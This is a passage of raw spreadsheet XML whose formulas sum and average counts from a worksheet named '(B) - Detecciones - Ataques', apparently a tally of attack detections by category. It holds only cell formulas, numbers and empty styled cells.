        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU27)</f>
        <v>79</v>
      </c>
      <c r="AV63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV27)</f>
        <v>16</v>
      </c>
      <c r="AW63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW27)</f>
        <v>0</v>
      </c>
      <c r="AX63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX27)</f>
        <v>91</v>
      </c>
      <c r="AY63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY27)</f>
        <v>0</v>
      </c>
      <c r="AZ63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ27)</f>
        <v>23</v>
      </c>
      <c r="BA63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA27)</f>
        <v>52</v>
      </c>
      <c r="BB63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB27)</f>
        <v>0</v>
      </c>
      <c r="BC63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC27)</f>
        <v>91701</v>
      </c>
      <c r="BD63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD27)</f>
        <v>0</v>
      </c>
      <c r="BE63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE27)</f>
        <v>154</v>
      </c>
      <c r="BF63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF27)</f>
        <v>13</v>
      </c>
      <c r="BG63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG27)</f>
        <v>5</v>
      </c>
      <c r="BH63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH27)</f>
        <v>796</v>
      </c>
      <c r="BI63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI27)</f>
        <v>6</v>
      </c>
      <c r="BJ63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ27)</f>
        <v>4</v>
      </c>
      <c r="BK63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK27)</f>
        <v>30</v>
      </c>
      <c r="BL63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL27)</f>
        <v>6</v>
      </c>
      <c r="BM63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM27)</f>
        <v>3736972</v>
      </c>
      <c r="BN63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN27)</f>
        <v>1413071</v>
      </c>
      <c r="BO63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO27)</f>
        <v>0</v>
      </c>
      <c r="BP63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP27)</f>
        <v>0</v>
      </c>
      <c r="BQ63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ27)</f>
        <v>218</v>
      </c>
      <c r="BR63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR27)</f>
        <v>0</v>
      </c>
      <c r="BS63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS27)</f>
        <v>38</v>
      </c>
      <c r="BT63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT27)</f>
        <v>6</v>
      </c>
      <c r="BU63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU27)</f>
        <v>0</v>
      </c>
      <c r="BV63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV27)</f>
        <v>2</v>
      </c>
      <c r="BW63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW27)</f>
        <v>14</v>
      </c>
      <c r="BX63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX27)</f>
        <v>0</v>
      </c>
      <c r="BY63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY27)</f>
        <v>73</v>
      </c>
      <c r="BZ63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ27)</f>
        <v>291</v>
      </c>
      <c r="CA63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA27)</f>
        <v>0</v>
      </c>
      <c r="CB63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB27)</f>
        <v>8</v>
      </c>
      <c r="CC63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC27)</f>
        <v>4</v>
      </c>
      <c r="CD63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD27)</f>
        <v>5</v>
      </c>
      <c r="CE63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE27)</f>
        <v>0</v>
      </c>
      <c r="CF63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF27)</f>
        <v>13</v>
      </c>
      <c r="CG63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG27)</f>
        <v>1</v>
      </c>
      <c r="CH63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH27)</f>
        <v>17</v>
      </c>
      <c r="CI63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI27)</f>
        <v>39</v>
      </c>
      <c r="CJ63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ27)</f>
        <v>4</v>
      </c>
      <c r="CK63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK27)</f>
        <v>39</v>
      </c>
      <c r="CL63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL27)</f>
        <v>0</v>
      </c>
      <c r="CM63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM27)</f>
        <v>304</v>
      </c>
      <c r="CN63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN27)</f>
        <v>4</v>
      </c>
      <c r="CO63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO27)</f>
        <v>29</v>
      </c>
      <c r="CP63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP27)</f>
        <v>140</v>
      </c>
      <c r="CQ63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ27)</f>
        <v>22</v>
      </c>
      <c r="CR63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR27)</f>
        <v>0</v>
      </c>
      <c r="CS63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS27)</f>
        <v>0</v>
      </c>
      <c r="CT63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT27)</f>
        <v>14</v>
      </c>
      <c r="CU63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU27)</f>
        <v>0</v>
      </c>
      <c r="CV63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV27)</f>
        <v>9</v>
      </c>
      <c r="CW63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW27)</f>
        <v>0</v>
      </c>
      <c r="CX63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX27)</f>
        <v>36</v>
      </c>
      <c r="CY63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY27)</f>
        <v>79</v>
      </c>
      <c r="CZ63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CZ27)</f>
        <v>0</v>
      </c>
      <c r="DA63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DA27)</f>
        <v>0</v>
      </c>
      <c r="DB63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DB27)</f>
        <v>0</v>
      </c>
      <c r="DC63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DC27)</f>
        <v>0</v>
      </c>
      <c r="DD63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DD27)</f>
        <v>21</v>
      </c>
      <c r="DE63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DE27)</f>
        <v>23</v>
      </c>
      <c r="DF63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DF27)</f>
        <v>11</v>
      </c>
      <c r="DG63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DG27)</f>
        <v>0</v>
      </c>
      <c r="DH63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DH27)</f>
        <v>1395</v>
      </c>
      <c r="DI63" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DI27)</f>
        <v>0</v>
      </c>
      <c r="DJ63" s="356">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FX3:$FX139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DJ27)</f>
        <v>22</v>
      </c>
      <c r="DK63" s="271"/>
      <c r="DO63" s="279"/>
      <c r="DP63" s="271"/>
      <c r="DQ63" s="271"/>
      <c r="DR63" s="271"/>
      <c r="DS63" s="271"/>
      <c r="DT63" s="271"/>
      <c r="DU63" s="271"/>
      <c r="DV63" s="271"/>
      <c r="DW63" s="271"/>
      <c r="DX63" s="271"/>
      <c r="DY63" s="271"/>
      <c r="DZ63" s="271"/>
      <c r="EA63" s="271"/>
      <c r="EB63" s="271"/>
      <c r="EC63" s="271"/>
      <c r="ED63" s="280"/>
      <c r="EG63" s="279"/>
      <c r="EH63" s="271"/>
      <c r="EI63" s="296"/>
      <c r="EJ63" s="296"/>
      <c r="EK63" s="296"/>
      <c r="EL63" s="296"/>
      <c r="EM63" s="296"/>
      <c r="EN63" s="296"/>
      <c r="EO63" s="271"/>
      <c r="EP63" s="444" t="s">
        <v>2413</v>
      </c>
      <c r="EQ63" s="483">
        <f t="shared" ref="EQ63:ET63" si="57">AVERAGE(EQ49:EQ62)</f>
        <v>0.8406849251</v>
      </c>
      <c r="ER63" s="483">
        <f t="shared" si="57"/>
        <v>0.7210951086</v>
      </c>
      <c r="ES63" s="483">
        <f t="shared" si="57"/>
        <v>0.7219836202</v>
      </c>
      <c r="ET63" s="483">
        <f t="shared" si="57"/>
        <v>0.8641203704</v>
      </c>
      <c r="EU63" s="478"/>
      <c r="EV63" s="419" t="s">
        <v>558</v>
      </c>
      <c r="EW63" s="484">
        <f t="shared" ref="EW63:EZ63" si="58">IF(EJ41=0,"-",EJ62/EJ41)</f>
        <v>0.5</v>
      </c>
      <c r="EX63" s="484">
        <f t="shared" si="58"/>
        <v>0.3571428571</v>
      </c>
      <c r="EY63" s="484">
        <f t="shared" si="58"/>
        <v>0.25</v>
      </c>
      <c r="EZ63" s="485">
        <f t="shared" si="58"/>
        <v>0.125</v>
      </c>
      <c r="FA63" s="479"/>
      <c r="FD63" s="480"/>
      <c r="FF63" s="338"/>
      <c r="FG63" s="69"/>
      <c r="FH63" s="69"/>
      <c r="FI63" s="69"/>
      <c r="FJ63" s="69"/>
      <c r="FM63" s="480"/>
      <c r="FN63" s="480"/>
      <c r="FO63" s="480"/>
      <c r="FP63" s="480"/>
      <c r="FQ63" s="480"/>
      <c r="FR63" s="480"/>
      <c r="FS63" s="480"/>
      <c r="FT63" s="480"/>
      <c r="FU63" s="480"/>
      <c r="FV63" s="480"/>
      <c r="FW63" s="480"/>
      <c r="FX63" s="480"/>
      <c r="FY63" s="21" t="s">
        <v>8</v>
      </c>
      <c r="GB63" s="480"/>
      <c r="GC63" s="21" t="s">
        <v>9</v>
      </c>
      <c r="GF63" s="480"/>
      <c r="GG63" s="480"/>
      <c r="GH63" s="480"/>
      <c r="GI63" s="480"/>
      <c r="GJ63" s="480"/>
      <c r="GK63" s="480"/>
      <c r="GL63" s="480"/>
      <c r="GM63" s="480"/>
      <c r="GN63" s="480"/>
      <c r="GO63" s="480"/>
      <c r="GP63" s="480"/>
      <c r="GQ63" s="480"/>
      <c r="GR63" s="480"/>
      <c r="GS63" s="480"/>
      <c r="GT63" s="480"/>
      <c r="GU63" s="480"/>
      <c r="GV63" s="480"/>
      <c r="GW63" s="480"/>
      <c r="GX63" s="480"/>
      <c r="GY63" s="480"/>
      <c r="GZ63" s="480"/>
      <c r="HA63" s="480"/>
      <c r="HB63" s="480"/>
      <c r="HC63" s="480"/>
      <c r="HD63" s="480"/>
      <c r="HE63" s="480"/>
      <c r="HF63" s="480"/>
      <c r="HG63" s="480"/>
      <c r="HH63" s="480"/>
      <c r="HI63" s="480"/>
      <c r="HJ63" s="480"/>
      <c r="HK63" s="480"/>
      <c r="HL63" s="480"/>
      <c r="HM63" s="480"/>
      <c r="HN63" s="480"/>
      <c r="HO63" s="480"/>
      <c r="HP63" s="480"/>
    </row>
    <row r="64">
      <c r="J64" s="277"/>
      <c r="K64" s="481">
        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!BD3:BD139)</f>
        <v>30417</v>
      </c>
      <c r="L64" s="482">
        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!BK3:BK139)</f>
        <v>30417</v>
      </c>
      <c r="M64" s="482">
        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!EF3:EF139)</f>
        <v>6111710</v>
      </c>
      <c r="N64" s="473">
        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!EO3:EO139)</f>
        <v>6111710</v>
      </c>
      <c r="O64" s="278"/>
      <c r="Q64" s="271"/>
      <c r="R64" s="352" t="s">
        <v>2531</v>
      </c>
      <c r="S64" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S27) + SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S27 &amp; "*") </f>
        <v>1</v>
      </c>
      <c r="T64" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T27) + SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="U64" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U27) + SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U27 &amp; "*") </f>
        <v>1</v>
      </c>
      <c r="V64" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,V27) + SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; V27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="W64" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,W27) + SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; W27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="X64" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,X27) + SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; X27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="Y64" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Y27) + SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Y27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="Z64" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Z27) + SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Z27 &amp; "*") </f>
        <v>566</v>
      </c>
      <c r="AA64" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AA27) + SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AA27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="AB64" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AB27) + SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AB27 &amp; "*") </f>
        <v>1</v>
      </c>
      <c r="AC64" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AC27) + SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AC27 &amp; "*") </f>
        <v>1</v>
      </c>
      <c r="AD64" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AD27) + SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AD27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="AE64" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AE27) + SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AE27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="AF64" s="354">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AF27) + SUMIFS('(B) - Detecciones - Ataques'!$BH3:$BH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AF27 &amp; "*") </f>
        <v>18</v>
      </c>
      <c r="AG64" s="271"/>
      <c r="AH64" s="352" t="s">
        <v>2531</v>
      </c>
      <c r="AI64" s="355">
